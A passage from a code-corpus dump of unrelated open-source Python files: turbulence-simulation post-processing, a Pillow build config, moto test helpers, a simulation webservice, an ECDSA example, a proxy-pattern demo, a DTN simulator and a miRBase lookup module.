3)
            # create the destination dataset, then copy the overlapping modes
dst_file.create_dataset(
dst_dset_name,
shape = dst_shape,
dtype = np.dtype(self.ctype),
fillvalue = complex(0))
for kz in range(min_shape[0]):
dst_file[dst_dset_name][kz,:min_shape[1], :min_shape[2]] = \
src_file[src_dset_name][kz, :min_shape[1], :min_shape[2]]
        src_file.close()
        return None
def prepare_post_file(
self,
opt = None):
self.pp_parameters.update(
self.extra_postprocessing_parameters(self.dns_type))
self.pars_from_namespace(
opt,
parameters = self.pp_parameters,
get_sim_info = False)
for kk in ['nx', 'ny', 'nz']:
self.parameters[kk] = self.get_data_file()['parameters/' + kk].value
n = self.parameters['nx']
if self.dns_type in ['filtered_slices',
'filtered_acceleration']:
            if opt.klist_kmax is None:
                opt.klist_kmax = n / 3.
            if opt.klist_kmin is None:
                opt.klist_kmin = 6.
kvals = bfps_addons.tools.power_space_array(
power = opt.klist_power,
size = opt.klist_size,
vmin = opt.klist_kmin,
vmax = opt.klist_kmax)
if opt.test_klist:
for i in range(opt.klist_size):
print('kcut{0} = {1}, ell{0} = {2:.3e}'.format(
i, kvals[i], 2*np.pi / kvals[i]))
opt.no_submit = True
self.pp_parameters['kcut'] = kvals
self.rewrite_par(
group = self.dns_type + '/parameters',
parameters = self.pp_parameters,
file_name = os.path.join(self.work_dir, self.simname + '_post.h5'))
histogram_bins = opt.histogram_bins
        if (histogram_bins is None and
'histogram_bins' in self.pp_parameters.keys()):
histogram_bins = self.pp_parameters['histogram_bins']
with h5py.File(os.path.join(self.work_dir, self.simname + '_post.h5'), 'r+') as ofile:
group = ofile[self.dns_type]
group.require_group('histograms')
group.require_group('moments')
group.require_group('spectra')
vec_spectra_stats = []
vec4_rspace_stats = []
scal_rspace_stats = []
if self.dns_type == 'joint_acc_vel_stats':
vec_spectra_stats.append('velocity')
vec4_rspace_stats.append('velocity')
vec_spectra_stats.append('acceleration')
vec4_rspace_stats.append('acceleration')
for quantity in scal_rspace_stats:
if quantity not in group['histograms'].keys():
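                    # aim for chunks of roughly 1 MiB: 2**20 bytes / (8 bytes per int64 * bins)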
time_chunk = 2**20 // (8*histogram_bins)
time_chunk = max(time_chunk, 1)
group['histograms'].create_dataset(
quantity,
(1, histogram_bins),
chunks = (time_chunk, histogram_bins),
maxshape = (None, histogram_bins),
dtype = np.int64)
else:
assert(histogram_bins ==
group['histograms/' + quantity].shape[1])
if quantity not in group['moments'].keys():
time_chunk = 2**20 // (8*10)
time_chunk = max(time_chunk, 1)
group['moments'].create_dataset(
quantity,
(1, 10),
chunks = (time_chunk, 10),
maxshape = (None, 10),
dtype = np.float64)
if self.dns_type == 'joint_acc_vel_stats':
quantity = 'acceleration_and_velocity_components'
if quantity not in group['histograms'].keys():
time_chunk = 2**20 // (8*9*histogram_bins**2)
time_chunk = max(time_chunk, 1)
group['histograms'].create_dataset(
quantity,
(1, histogram_bins, histogram_bins, 3, 3),
chunks = (time_chunk, histogram_bins, histogram_bins, 3, 3),
maxshape = (None, histogram_bins, histogram_bins, 3, 3),
dtype = np.int64)
quantity = 'acceleration_and_velocity_magnitudes'
if quantity not in group['histograms'].keys():
time_chunk = 2**20 // (8*histogram_bins**2)
time_chunk = max(time_chunk, 1)
group['histograms'].create_dataset(
quantity,
(1, histogram_bins, histogram_bins),
chunks = (time_chunk, histogram_bins, histogram_bins),
maxshape = (None, histogram_bins, histogram_bins),
dtype = np.int64)
ncomps = 4
for quantity in vec4_rspace_stats:
if quantity not in group['histograms'].keys():
time_chunk = 2**20 // (8*histogram_bins*ncomps)
time_chunk = max(time_chunk, 1)
group['histograms'].create_dataset(
quantity,
(1, histogram_bins, ncomps),
chunks = (time_chunk, histogram_bins, ncomps),
maxshape = (None, histogram_bins, ncomps),
dtype = np.int64)
if quantity not in group['moments'].keys():
time_chunk = 2**20 // (8*10*ncomps)
time_chunk = max(time_chunk, 1)
group['moments'].create_dataset(
quantity,
(1, 10, ncomps),
chunks = (time_chunk, 10, ncomps),
maxshape = (None, 10, ncomps),
dtype = np.float64)
time_chunk = 2**20 // (
4*3*
self.parameters['nx']*self.parameters['ny'])
time_chunk = max(time_chunk, 1)
for quantity in vec_spectra_stats:
df = self.get_data_file()
if quantity + '_' + quantity not in group['spectra'].keys():
spec_chunks = df['statistics/spectra/velocity_velocity'].chunks
spec_shape = df['statistics/spectra/velocity_velocity'].shape
spec_maxshape = df['statistics/spectra/velocity_velocity'].maxshape
group['spectra'].create_dataset(
quantity + '_' + quantity,
spec_shape,
chunks = spec_chunks,
maxshape = spec_maxshape,
dtype = np.float64)
df.close()
return None
def prepare_field_file(self):
df = self.get_data_file()
if 'field_dtype' in df.keys():
# we don't need to do anything, raw binary files are used
return None
last_iteration = df['iteration'].value
cppf = df['parameters/checkpoints_per_file'].value
niter_out = df['parameters/niter_out'].value
with h5py.File(os.path.join(self.work_dir, self.simname + '_fields.h5'), 'a') as ff:
ff.require_group('vorticity')
ff.require_group('vorticity/complex')
checkpoint = 0
while True:
cpf_name = os.path.join(
self.work_dir,
self.simname + '_checkpoint_{0}.h5'.format(checkpoint))
if os.path.exists(cpf_name):
cpf = h5py.File(cpf_name, 'r')
for iter_name in cpf['vorticity/complex'].keys():
if iter_name not in ff['vorticity/complex'].keys():
ff['vorticity/complex/' + iter_name] = h5py.ExternalLink(
cpf_name,
'vorticity/complex/' + iter_name)
                cpf.close()
                checkpoint += 1
else:
break
return None
def launch_jobs(
self,
opt = None,
particle_initial_condition = None):
self.prepare_post_file(opt)
self.prepare_field_file()
self.run(
nb_processes = opt.nb_processes,
nb_threads_per_process = opt.nb_threads_per_process,
njobs = opt.njobs,
hours = opt.minutes // 60,
minutes = opt.minutes % 60,
no_submit = opt.no_submit,
err_file = 'err_' + self.dns_type,
out_file = 'out_' + self.dns_type)
return None
| gpl-3.0 | 8,611,814,064,329,809,000 | 44.294621 | 103 | 0.471701 | false | 4.123192 | false | false | false |
mollstam/UnrealPy | UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/Pillow-2.9.0/winbuild/config.py | 2 | 3822 | import os
SF_MIRROR = 'http://iweb.dl.sourceforge.net'
pythons = {#'26': 7,
'27': 7,
#'32': 7,
'33': 7.1,
'34': 7.1}
VIRT_BASE = "c:/vp/"
X64_EXT = os.environ.get('X64_EXT', "x64")
libs = {
'zlib': {
'url': 'http://zlib.net/zlib128.zip',
'hash': 'md5:126f8676442ffbd97884eb4d6f32afb4',
'dir': 'zlib-1.2.8',
},
'jpeg': {
'url': 'http://www.ijg.org/files/jpegsr9a.zip',
'hash': 'md5:a34f3c82760270ee1e1885b15b90a72e', # not found - generated by wiredfool
'dir': 'jpeg-9a',
},
'tiff': {
'url': 'ftp://ftp.remotesensing.org/pub/libtiff/tiff-4.0.4.zip',
'hash': 'md5:8f538a34156188f9a8dcddb679c65d1e',
'dir': 'tiff-4.0.4',
},
'freetype': {
'url': 'http://download.savannah.gnu.org/releases/freetype/freetype-2.6.tar.gz',
'hash': 'md5:1d733ea6c1b7b3df38169fbdbec47d2b',
'dir': 'freetype-2.6',
},
'lcms': {
'url': SF_MIRROR+'/project/lcms/lcms/2.7/lcms2-2.7.zip',
'hash': 'sha1:7ff1a5b721ca719760ba6eb4ec6f38d5e65381cf',
'dir': 'lcms2-2.7',
},
'tcl-8.5': {
'url': SF_MIRROR+'/project/tcl/Tcl/8.5.18/tcl8518-src.zip',
'hash': 'sha1:4c2aed9043088c630a4c795265e2738ef1b4db3b',
'dir': '',
},
'tk-8.5': {
'url': SF_MIRROR+'/project/tcl/Tcl/8.5.18/tk8518-src.zip',
'hash': 'sha1:273f55148777413774aa722ecad25cabda1e31ae',
'dir': '',
'version':'8.5.18',
},
'tcl-8.6': {
'url': SF_MIRROR+'/project/tcl/Tcl/8.6.4/tcl864-src.zip',
'hash': 'md5:35748d2fc61e08a2fdb23b85c6f8c4a0',
'dir': '',
},
'tk-8.6': {
'url': SF_MIRROR+'/project/tcl/Tcl/8.6.4/tk864-src.zip',
'hash': 'md5:111d45061a69e7f5250b6ec8ca7c4f35',
'dir': '',
'version':'8.6.4',
},
'webp': {
'url': 'http://downloads.webmproject.org/releases/webp/libwebp-0.4.3.tar.gz',
'hash': 'sha1:1c307a61c4d0018620b4ba9a58e8f48a8d6640ef',
'dir': 'libwebp-0.4.3',
},
'openjpeg': {
'url': SF_MIRROR+'/project/openjpeg/openjpeg/2.1.0/openjpeg-2.1.0.tar.gz',
'hash': 'md5:f6419fcc233df84f9a81eb36633c6db6',
'dir': 'openjpeg-2.1.0',
},
}
bin_libs = {
'openjpeg': {
'filename': 'openjpeg-2.0.0-win32-x86.zip',
'hash': 'sha1:xxx',
'version': '2.0'
},
}
compilers = {
(7, 64): {
'env_version': 'v7.0',
'vc_version': '2008',
'env_flags': '/x64 /xp',
'inc_dir': 'msvcr90-x64',
'platform': 'x64',
'webp_platform': 'x64',
},
(7, 32): {
'env_version': 'v7.0',
'vc_version': '2008',
'env_flags': '/x86 /xp',
'inc_dir': 'msvcr90-x32',
'platform': 'Win32',
'webp_platform': 'x86',
},
(7.1, 64): {
'env_version': 'v7.1',
'vc_version': '2010',
'env_flags': '/x64 /vista',
'inc_dir': 'msvcr10-x64',
'platform': 'x64',
'webp_platform': 'x64',
},
(7.1, 32): {
'env_version': 'v7.1',
'vc_version': '2010',
'env_flags': '/x86 /vista',
'inc_dir': 'msvcr10-x32',
'platform': 'Win32',
'webp_platform': 'x86',
},
}
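# Hedged sketch (not part of the original script): how a 'hash' entry from
# `libs` might be verified after download; the helper name is illustrative.
def _check_hash_sketch(data, spec):
    # spec looks like 'md5:<hexdigest>' or 'sha1:<hexdigest>'
    import hashlib
    algo, _, expected = spec.partition(':')
    return hashlib.new(algo, data).hexdigest() == expected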
def pyversion_fromEnv():
py = os.environ['PYTHON']
py_version = '27'
for k in pythons.keys():
if k in py:
py_version = k
break
if '64' in py:
py_version = '%s%s' % (py_version, X64_EXT)
return py_version
def compiler_fromEnv():
    py = os.environ['PYTHON']
    compiler_version = pythons['27']  # fallback when no known version matches
    for k, v in pythons.items():
        if k in py:
            compiler_version = v
            break
bit = 32
if '64' in py:
bit = 64
return compilers[(compiler_version, bit)]
| mit | 7,292,043,135,636,486,000 | 25.358621 | 93 | 0.502878 | false | 2.489902 | false | false | false |
DataDog/moto | tests/helpers.py | 2 | 1220 | from __future__ import unicode_literals
import boto
import six
from nose.plugins.skip import SkipTest
def version_tuple(v):
return tuple(map(int, (v.split("."))))
# Note: See https://github.com/spulec/moto/issues/201 for why this is a separate method.
def skip_test():
raise SkipTest
class requires_boto_gte(object):
"""Decorator for requiring boto version greater than or equal to 'version'"""
def __init__(self, version):
self.version = version
def __call__(self, test):
boto_version = version_tuple(boto.__version__)
required = version_tuple(self.version)
if boto_version >= required:
return test
return skip_test
class py3_requires_boto_gte(object):
"""Decorator for requiring boto version greater than or equal to 'version'
when running on Python 3. (Not all of boto is Python 3 compatible.)"""
def __init__(self, version):
self.version = version
def __call__(self, test):
if not six.PY3:
return test
boto_version = version_tuple(boto.__version__)
required = version_tuple(self.version)
if boto_version >= required:
return test
return skip_test
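# Hedged usage sketch; the decorated test below is illustrative only.
#
#   @requires_boto_gte("2.9")
#   def test_feature_added_in_boto_29():
#       ...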
| apache-2.0 | 7,139,768,139,323,090,000 | 28.047619 | 88 | 0.639344 | false | 4.080268 | true | false | false |
fieldsofview/sim-city-webservice | scripts/app.py | 1 | 6851 | # SIM-CITY webservice
#
# Copyright 2015 Joris Borgdorff <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from gevent import monkey; monkey.patch_all()
from bottle import post, get, run, delete, request, response, HTTPResponse
import simcity
from simcity.util import listfiles
from simcityweb.util import error, get_simulation_config
import simcityexplore
from couchdb.http import ResourceConflict
from picas.documents import Document
config_sim = simcity.get_config().section('Simulations')
couch_cfg = simcity.get_config().section('task-db')
@get('/explore/simulate/<name>/<version>')
def get_simulation_by_name_version(name, version=None):
try:
sim, version = get_simulation_config(name, version, config_sim)
return sim[version]
except HTTPResponse as ex:
return ex
@get('/explore/simulate/<name>')
def get_simulation_by_name(name):
try:
sim, version = get_simulation_config(name, None, config_sim)
return sim
except HTTPResponse as ex:
return ex
@get('/explore')
def explore():
return "API: overview | simulate | job"
@get('/explore/simulate')
def simulate_list():
files = listfiles(config_sim['path'])
return {"simulations": [f[:-5] for f in files if f.endswith('.json')]}
@post('/explore/simulate/<name>/<version>')
def simulate_name_version(name, version=None):
try:
sim, version = get_simulation_config(name, version, config_sim)
sim = sim[version]
query = dict(request.json)
task_id = None
if '_id' in query:
task_id = query['_id']
del query['_id']
params = simcityexplore.parse_parameters(query, sim['parameters'])
except HTTPResponse as ex:
return ex
except ValueError as ex:
return error(400, ex.message)
task_props = {
'name': name,
'ensemble': query['ensemble'],
'command': sim['command'],
'version': version,
'input': params,
}
if task_id is not None:
task_props['_id'] = task_id
try:
token = simcity.add_task(task_props)
except ResourceConflict:
return error(400, "simulation name " + task_id + " already taken")
try:
simcity.submit_if_needed(config_sim['default_host'], 1)
    except Exception:
        pass  # too bad; the user can still call /explore/job manually
response.status = 201 # created
url = '%s%s/%s' % (couch_cfg.get('public_url', couch_cfg['url']), couch_cfg['database'],
token.id)
response.set_header('Location', url)
return token.value
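# Hedged usage sketch for the route above; the payload fields are illustrative
# assumptions (host and port come from the run() call at the end of this file).
#
#   curl -X POST http://localhost:9090/explore/simulate/<name>/<version> \
#        -H 'Content-Type: application/json' \
#        -d '{"ensemble": "demo", "some_parameter": 1}'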
@post('/explore/simulate/<name>')
def simulate_name(name):
return simulate_name_version(name)
@get('/explore/view/totals')
def overview():
try:
return simcity.overview_total()
    except Exception:
return error(500, "cannot read overview")
@post('/explore/job')
def submit_job():
return submit_job_to_host(config_sim['default_host'])
@post('/explore/job/<host>')
def submit_job_to_host(host):
try:
job = simcity.submit_if_needed(host, int(config_sim['max_jobs']))
except ValueError:
return error(404, "Host " + host + " unknown")
except IOError:
return error(502, "Cannot connect to host")
else:
if job is None:
response.status = 503 # service temporarily unavailable
else:
response.status = 201 # created
return {key: job[key] for key in ['_id', 'batch_id', 'hostname']}
@get('/explore/view/simulations/<name>/<version>')
def simulations_view(name, version):
sim, version = get_simulation_config(name, version, config_sim)
design_doc = name + '_' + version
doc_id = '_design/' + design_doc
task_db = simcity.get_task_database()
try:
task_db.get(doc_id)
    except Exception:
map_fun = """
function(doc) {
if (doc.type === "task" && doc.name === "%s" && doc.version === "%s") {
emit(doc._id, {
"id": doc._id,
"rev": doc._rev,
"ensemble": doc.ensemble,
"url": "%s%s/" + doc._id,
"error": doc.error,
"lock": doc.lock,
"done": doc.done,
"input": doc.input
});
}
}""" % (name, version, '/couchdb/', couch_cfg['database'])
task_db.add_view('all_docs', map_fun, design_doc=design_doc)
url = '%s%s/%s/_view/all_docs' % ('/couchdb/', # couch_cfg['public_url'],
couch_cfg['database'], doc_id)
response.status = 302 # temporary redirect
response.set_header('Location', url)
return
@get('/explore/view/simulations/<name>/<version>/<ensemble>')
def ensemble_view(name, version, ensemble):
sim, version = get_simulation_config(name, version, config_sim)
design_doc = '{}_{}_{}'.format(name, version, ensemble)
doc_id = '_design/' + design_doc
task_db = simcity.get_task_database()
try:
task_db.get(doc_id)
    except Exception:
map_fun = """
function(doc) {
if (doc.type === "task" && doc.name === "%s" && doc.version === "%s" && doc.ensemble === "%s") {
emit(doc._id, {
"id": doc._id,
"rev": doc._rev,
"url": "%s%s/" + doc._id,
"error": doc.error,
"lock": doc.lock,
"done": doc.done,
"input": doc.input
});
}
}""" % (name, version, ensemble, '/couchdb/', couch_cfg['database'])
task_db.add_view('all_docs', map_fun, design_doc=design_doc)
url = '%s%s/%s/_view/all_docs' % ('/couchdb/', # couch_cfg['public_url'],
couch_cfg['database'], doc_id)
response.status = 302 # temporary redirect
response.set_header('Location', url)
return
@get('/explore/simulation/<id>')
def get_simulation(id):
try:
return simcity.get_task_database().get(id).value
except ValueError:
return error(404, "simulation does not exist")
@delete('/explore/simulation/<id>')
def del_simulation(id):
rev = request.query.get('rev')
if rev is None:
rev = request.get_header('If-Match')
if rev is None:
return error(409, "revision not specified")
task = Document({'_id': id, '_rev': rev})
try:
simcity.get_task_database().delete(task)
return {'ok': True}
except ResourceConflict:
return error(409, "resource conflict")
run(host='localhost', port=9090, server='gevent')
| apache-2.0 | -7,256,146,511,198,649,000 | 28.530172 | 98 | 0.610714 | false | 3.504348 | true | false | false |
seb-m/wcurve | examples/ecdsa.py | 1 | 2981 | """
ECDSA signature scheme.
Requires Python >= 2.4 (http://pypi.python.org/pypi/hashlib is needed for
python2.4).
"""
import hashlib
import random
import time
# Local import
try:
import wcurve
except ImportError:
from os.path import abspath, dirname
import sys
parent = dirname(dirname(abspath(__file__)))
sys.path.append(parent)
import wcurve
def _big_int_unpack_be(seq):
    # big-endian: seq[0] is the most significant byte
    p = None
    if isinstance(seq, str):
        p = lambda x: ord(x)
    else:
        p = lambda x: x
    n = len(seq)
    return sum([p(seq[i]) << ((n - 1 - i) * 8) for i in range(n)])
def generate_keypair(curve):
sk = random.SystemRandom().randint(1, curve.n - 1)
pk = sk * curve.base_point
pk.canonicalize() # needed for ephemeral key gen in sign()
return sk, pk
def sign(curve, secret_key, msg):
assert isinstance(curve, wcurve._Curve)
while True:
esk, epk = generate_keypair(curve)
r = epk.x % curve.n
if r == 0:
continue
e = _big_int_unpack_be(hashlib.sha256(msg.encode('utf8')).digest())
kinv = wcurve._FpArithmetic(curve.n).inverse(esk)
s = (kinv * (e + r * secret_key)) % curve.n
if s == 0:
continue
return r, s
def verify(pub_key, signature, msg):
if not isinstance(pub_key, wcurve.JacobianPoint):
return False
r, s = signature
curve = pub_key.curve
for v in signature:
if not (1 <= v <= (curve.n - 1)):
return False
e = _big_int_unpack_be(hashlib.sha256(msg.encode('utf8')).digest())
sinv = wcurve._FpArithmetic(curve.n).inverse(s)
u1 = e * sinv % curve.n
u2 = r * sinv % curve.n
q = u1 * curve.base_point + u2 * pub_key
if q.is_at_infinity():
return False
v = q.get_affine_x() % curve.n
if r == v:
return True
return False
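# Hedged usage sketch: a minimal sign/verify round trip using the helpers above.
#
#   curve = wcurve.secp256r1_curve()
#   sk, pk = generate_keypair(curve)
#   sig = sign(curve, sk, "message")
#   assert verify(pk, sig, "message")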
def run(curve, tag):
sk, pk = generate_keypair(curve)
msg = "My message to sign"
# Signature
start = time.time()
sig = sign(curve, sk, msg)
sign_time = time.time() - start
# For signature verification there is no meaning of using infective
# computations in scalar multiplications.
if curve.infective:
pk.curve = wcurve.secp256r1_curve()
# Verification
start = time.time()
# /!\ in a real implementation the public key would most likely come
# from an untrusted remote party so it would then be required to check
# the validity of the public key before calling this function. That is
# instantiating the right curve, calling JacobianPoint.from_affine()
# or JacobianPoint.uncompress(), and calling JacobianPoint.is_valid().
valid = verify(pk, sig, msg)
verify_time = time.time() - start
print('%-25s: sign=%0.3fs verify=%0.3fs valid=%s' % \
(tag, sign_time, verify_time, valid))
if __name__ == '__main__':
run(wcurve.secp256r1_curve(), 'secp256r1')
run(wcurve.secp256r1_curve_infective(),
'secp256r1_curve_infective')
| mit | 4,652,287,337,975,180,000 | 29.418367 | 75 | 0.614559 | false | 3.301218 | false | false | false |
jackaljack/design-patterns | proxy.py | 1 | 1771 | """Proxy pattern
Proxy is a structural design pattern. A proxy is a surrogate object which can
communicate with the real object (aka implementation). Whenever a method in the
surrogate is called, the surrogate simply calls the corresponding method in
the implementation. The real object is encapsulated in the surrogate object when
the latter is instantiated. It's NOT mandatory that the real object class and
the surrogate object class share the same common interface.
"""
from abc import ABC, abstractmethod
class CommonInterface(ABC):
"""Common interface for Implementation (real obj) and Proxy (surrogate)."""
@abstractmethod
def load(self):
pass
@abstractmethod
def do_stuff(self):
pass
class Implementation(CommonInterface):
def __init__(self, filename):
self.filename = filename
def load(self):
print("load {}".format(self.filename))
def do_stuff(self):
print("do stuff on {}".format(self.filename))
class Proxy(CommonInterface):
def __init__(self, implementation):
self.__implementation = implementation # the real object
self.__cached = False
def load(self):
self.__implementation.load()
self.__cached = True
def do_stuff(self):
if not self.__cached:
self.load()
self.__implementation.do_stuff()
def main():
p1 = Proxy(Implementation("RealObject1"))
p2 = Proxy(Implementation("RealObject2"))
p1.do_stuff() # loading necessary
p1.do_stuff() # loading unnecessary (use cached object)
p2.do_stuff() # loading necessary
p2.do_stuff() # loading unnecessary (use cached object)
p1.do_stuff() # loading unnecessary (use cached object)
if __name__ == "__main__":
main()
| mit | -7,203,322,972,638,070,000 | 27.111111 | 80 | 0.673066 | false | 4.277778 | false | false | false |
LeoIannacone/dtn | emulab/theory.py | 5 | 5674 | #!/usr/bin/python
import sys
from heapq import *
from optparse import OptionParser
def dprint(msg):
print "[%d]: %s" % (time, msg)
arglist = ("count", "size", "num_hops", "bw", "hop_mode", "conn", "uptime", "downtime")
usage = "usage: %prog [options]"
parser = OptionParser(usage)
parser.add_option('--size', type='int', help='size of each message')
parser.add_option('--count', type='int', help='number of messages')
parser.add_option('--num_hops', type='int', help='number of hops')
parser.add_option('--bw', type='int', help='bandwidth')
parser.add_option('--hop_mode', help='hop mode (hop or e2e)')
parser.add_option('--conn', help='connectivity mode')
parser.add_option('--uptime', type='int', help='uptime in seconds')
parser.add_option('--downtime', type='int', help='downtime in seconds')
parser.set_defaults(num_hops=5)
parser.set_defaults(uptime=60)
parser.set_defaults(downtime=240)
(opts, args) = parser.parse_args()
def die():
parser.print_help()
sys.exit(0)
if opts.count is None or \
   opts.size is None or \
   opts.num_hops is None or \
   opts.bw is None or \
   opts.hop_mode is None or \
   opts.conn is None or \
   opts.uptime is None or \
   opts.downtime is None: die()
count = opts.count
size = opts.size
num_hops = opts.num_hops
bw = opts.bw
uptime = opts.uptime
downtime = opts.downtime
hop_mode = opts.hop_mode
conn = opts.conn
last = num_hops - 1
total_size = count * size * 8
amount = map(lambda x: 0, range(0, num_hops))
links = map(lambda x: True, range(0, num_hops))
amount[0] = total_size
q = []
class SimDoneEvent:
def __init__(self, time):
self.time = time
    def __cmp__(self, other):
        # needed so the heap can order this event against LinkEvent instances
        return cmp(self.time, other.time)
    def run(self):
print "maximum simulation time (%d) reached... ending simulation" % self.time
sys.exit(1)
class LinkEvent:
def __init__(self, time, link, mode):
self.time = time
self.link = link
self.mode = mode
def __cmp__(self, other):
return self.time.__cmp__(other.time)
def __str__(self):
return "Event @%d: link %d %s" % (self.time, self.link, self.mode)
def run(self):
if self.mode == 'up':
dprint('opening link %d' % self.link)
links[self.link] = True
self.time += uptime
self.mode = 'down'
else:
dprint('closing link %d' % self.link)
links[self.link] = False
self.time += downtime
self.mode = 'up'
queue_event(self)
class CompletedEvent:
def __init__(self, time, node):
self.time = time
self.node = node
def run(self):
pass
def queue_event(e):
global q
# dprint('queuing event %s' % e)
heappush(q, e)
# simulator completion event
time = 0
queue_event(SimDoneEvent(60*30))
# initial link events
if (conn == 'conn'):
pass
elif (conn == 'all2'):
for i in range(1, num_hops):
queue_event(LinkEvent(uptime, i, 'down'))
elif (conn == 'sequential'):
queue_event(LinkEvent(uptime, 1, 'down'))
for i in range(2, num_hops):
links[i] = False
queue_event(LinkEvent((i-1) * 60, i, 'up'))
elif (conn == 'offset2'):
for i in range (1, num_hops):
if i % 2 == 0:
links[i] = False
queue_event(LinkEvent(120, i, 'up'))
else:
queue_event(LinkEvent(uptime, i, 'down'))
elif (conn == 'shift10'):
if num_hops * 10 > 60:
raise(ValueError("can't handle more than 6 hops"))
queue_event(LinkEvent(uptime, 1, 'down'))
for i in range (2, num_hops):
links[i] = False
queue_event(LinkEvent(10 * (i-1), i, 'up'))
else:
raise(ValueError("conn mode %s not defined" % conn))
print 'initial link states:'
for i in range(0, num_hops):
print '\t%d: %s' % (i, links[i])
def can_move(i):
if hop_mode == 'hop':
dest = i+1
hops = (i+1,)
else:
dest = last
hops = range(i+1, last+1)
for j in hops:
if links[j] != True:
# dprint("can't move data from %d to %d since link %d closed" % (i, dest, j))
return False
return True
# proc to shuffle a given amount of data through the network
def move_data(interval):
dprint('%d seconds elapsed... trying to move data' % interval)
for i in range(0, last):
if not can_move(i):
continue
if hop_mode == 'hop':
dest = i+1
else:
dest = last
amt = min(amount[i], interval * bw)
if (amt != 0):
dprint('moving %d/%d bits (%d msgs) from %d to %d' %
(amt, amount[i], amt / (size*8), i, dest))
amount[i] -= amt
amount[dest] += amt
if dest == last and amount[dest] == total_size:
print "all data transferred..."
print "ELAPSED %d" % (time + interval)
sys.exit(0)
def blocked():
for i in range(0, last):
if can_move(i):
return False
return True
def completion_time():
# if nothing can move, then we have infinite completion time
if blocked():
return 9999999999.0
return float(sum(amount[:-1])) / float(bw)
while True:
try:
next_event = heappop(q)
    except IndexError:
raise RuntimeError('no events in queue but not complete')
tcomplete = completion_time()
elapsed = next_event.time - time
if (tcomplete < elapsed):
dprint('trying to move last chunk')
move_data(tcomplete)
time = next_event.time
if (elapsed != 0 and not blocked()):
move_data(elapsed)
next_event.run()
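# Hedged usage sketch (illustrative parameter values only):
#
#   python theory.py --count 100 --size 1000 --bw 100000 \
#       --hop_mode hop --conn sequential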
| apache-2.0 | -5,409,233,377,742,971,000 | 24.908676 | 88 | 0.561509 | false | 3.308455 | false | false | false |
ucsd-ccbb/Oncolist | src/restLayer/app/MirBase.py | 1 | 2673 | import requests
import tarfile,sys
import urllib2
import json
import time
import pymongo
from itertools import islice
def run_mirbase_download():
load_mirbase_list(0)
return 0
def get_mir_data(mirna):
client = pymongo.MongoClient()
mirna_data = {
'results': []
}
mirnaarray = mirna.split(',')
    for mirna_item in mirnaarray:
        terms = list(client.dataset.mirbase.find({'mId': mirna_item}))
        if len(terms) > 0:
mirna_data['results'].append({
'id': mirna_item,
'information': terms[0]['mirna_information']
})
return mirna_data
def get_mir_name_converter(term_id):
client = pymongo.MongoClient()
terms = list(client.dataset.mirbase.find({'mId': term_id}))
    if len(terms) > 0:
return terms[0]['mirna_id']
else:
return "UNKNOWN"
def get_mirbase_info(mirna_id): # EXT
mir_resolved_id = get_mir_name_converter(mirna_id)
    if mir_resolved_id != "UNKNOWN":
url = 'http://mygene.info/v2/query?q=' + mir_resolved_id
r = requests.get(url)
r_json = r.json()
if 'hits' in r_json and len(r_json['hits']) > 0:
entrezgene_id = r_json['hits'][0]['entrezgene']
url2 = 'http://mygene.info/v2/gene/' + str(entrezgene_id)
r2 = requests.get(url2)
r2_json = r2.json()
return r2_json
return r
else:
return "UNKNOWN TERM"
def load_mirbase_list(file_batch_number):
url = 'http://ec2-54-148-99-18.us-west-2.compute.amazonaws.com:9200/_plugin/head/mirna.txt'
r = requests.get(url)
lines = r.iter_lines()
def parse(lines):
for line in lines:
try:
c1, mirna_id, mId, c2, c3, c4, mirna_information, c5 = line.split('\t')
yield {
'mirna_id': mirna_id,
'mId': mId,
'mirna_information': mirna_information
}
except Exception as e:
warningLabel = e.message
db = pymongo.MongoClient().dataset
collection = db.mirbase
collection.drop()
count = 0
iterator = parse(lines)
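    # drain the generator in batches of 1000 and bulk-insert each batch, so the
    # whole file is never materialized in memory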
while True:
records = [record for record in islice(iterator, 1000)]
if len(records) > 0:
count += len(collection.insert_many(records).inserted_ids)
else:
break
collection.create_indexes([
pymongo.IndexModel([('mirna_id', pymongo.ASCENDING)]),
pymongo.IndexModel([('mId', pymongo.ASCENDING)])
])
def main():
return 0
if __name__ == '__main__':
sys.exit(main()) | mit | -9,162,671,989,890,276,000 | 24.961165 | 95 | 0.558548 | false | 3.3 | false | false | false |
ilastik/ilastik-0.5 | ilastik/modules/interactive_segmentation/core/segmentors/segmentorSV2.py | 1 | 5024 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2010 C Sommer, C Straehle, U Koethe, FA Hamprecht. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are
# permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of
# conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list
# of conditions and the following disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE ABOVE COPYRIGHT HOLDERS ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE ABOVE COPYRIGHT HOLDERS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those of the
# authors and should not be interpreted as representing official policies, either expressed
# or implied, of their employers.
"""
Watershed iterative segmentation plugin
"""
from segmentorBase import *
from enthought.traits.api import Float, Int
from enthought.traits.ui.api import View, Item
